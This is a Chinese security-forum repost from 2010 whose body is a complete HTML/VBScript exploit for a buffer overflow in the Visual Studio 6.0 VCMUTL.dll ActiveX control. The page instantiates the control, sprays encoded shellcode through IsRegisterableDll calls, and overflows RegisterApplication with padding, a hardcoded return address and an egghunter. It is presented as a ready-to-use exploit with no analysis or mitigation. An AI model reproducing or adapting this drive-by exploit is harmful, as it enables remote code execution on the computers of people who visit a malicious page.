[转帖]Visual Studio 6.0 (VCMUTL.dll) ActiveX 存在缓冲溢出漏洞-二进制漏洞-看雪-安全社区|安全招聘|kanxue.com

[转帖]Visual Studio 6.0 (VCMUTL.dll) ActiveX 存在缓冲溢出漏洞

发表于: 2010-7-28 15:51 3504

[转帖]Visual Studio 6.0 (VCMUTL.dll) ActiveX 存在缓冲溢出漏洞

freebsdlin 活跃值

2010-7-28 15:51

3504

Exploit:  
 
<html>  
 
<object classid='clsid:723AA6D1-3B50-11D1-9636-00600818410C' id='target'></object>  
 
<script language='vbscript'>  
 
shellcode = unescape("%u7a44%u3732%u7a44%u3732%u03eb%ueb59%ue805%ufff8%uffff") & _  
 
            unescape("%u494f%u4949%u4949%u5149%u565a%u5854%u3336%u5630%u3458") & _  
 
            unescape("%u3041%u3642%u4848%u4230%u3033%u4342%u5856%u4232%u4244") & _  
 
            unescape("%u3448%u3241%u4441%u4130%u5444%u4442%u4251%u4130%u4144") & _  
 
            unescape("%u5856%u5a34%u4238%u4a44%u4d4f%u4f4e%u4e4a%u3446%u5042") & _  
 
            unescape("%u5042%u5042%u384b%u3445%u534e%u584b%u374e%u3045%u574a") & _  
 
            unescape("%u3041%u4e4f%u384b%u344f%u314a%u584b%u454f%u3242%u3041") & _  
 
            unescape("%u4e4b%u3449%u584b%u3346%u484b%u3041%u4e50%u5341%u4c42") & _  
 
            unescape("%u4949%u4a4e%u4846%u4c42%u5746%u3047%u4c41%u4c4c%u304d") & _  
 
            unescape("%u3041%u4c44%u4e4b%u4f46%u434b%u5546%u3246%u3046%u5745") & _  
 
            unescape("%u4e45%u584b%u454f%u3246%u5041%u4e4b%u3648%u584b%u304e") & _  
 
            unescape("%u544b%u584b%u554f%u514e%u5041%u4e4b%u484b%u414e%u484b") & _  
 
            unescape("%u3041%u4e4b%u5849%u454e%u5246%u5046%u4c43%u5341%u4c42") & _  
 
            unescape("%u4646%u384b%u3442%u5342%u4845%u4c42%u574a%u304e%u484b") & _  
 
            unescape("%u3442%u504e%u384b%u5742%u314e%u4a4d%u584b%u364a%u304a") & _  
 
            unescape("%u4e4b%u5049%u484b%u5842%u4b42%u3042%u3042%u3042%u384b") & _  
 
            unescape("%u464a%u334e%u454f%u5341%u4f48%u4642%u5548%u3849%u4f4a") & _  
 
            unescape("%u4843%u4c42%u474b%u3542%u564a%u5750%u4d4a%u4e44%u3743") & _  
 
            unescape("%u364a%u494a%u4f50%u384c%u5050%u4547%u4f4f%u4e47%u5643") & _  
 
            unescape("%u4641%u364e%u5643%u5042%u5a5a")  
 
buffer1 = string(262, "A")  
 
ecx = unescape("%u0090%u0090")  
 
eip = unescape("%u048b%u0041") ' eip = unescape("%u048b%u0041") <--- (sp3 en) # eip = unescape("%u048b%u0041") <--- (sp3 fr)  
 
fill = string(4, "A")  
 
nop = string(600, "A")  
 
egg = egg + "TUYAIAIAIAIAIAIAIAIAIAIAIAIAIAIAjXAQADAZABARA" 
 
egg = egg + "LAYAIAQAIAQAIAhAAAZ1AIAIAJ11AIAIABABABQI1AIQI" 
 
egg = egg + "AIQI111AIAJQYAZBABABABABkMAGB9u4JBaVRaxJYoLOm" 
 
egg = egg + "rpRbJKR0XvmLnmlKUNzSDhotxOTsJNRnWdKXzTo3EzJvO" 
 
egg = egg + "bUWwyoWwZjA" 
 
exploit = buffer1 + eip + fill + ecx + egg  
 
target.IsRegisterableDll shellcode  
 
target.IsRegisterableDll shellcode  
 
target.IsRegisterableDll shellcode  
 
target.RegisterApplication exploit   
 
</script>  
 
</html>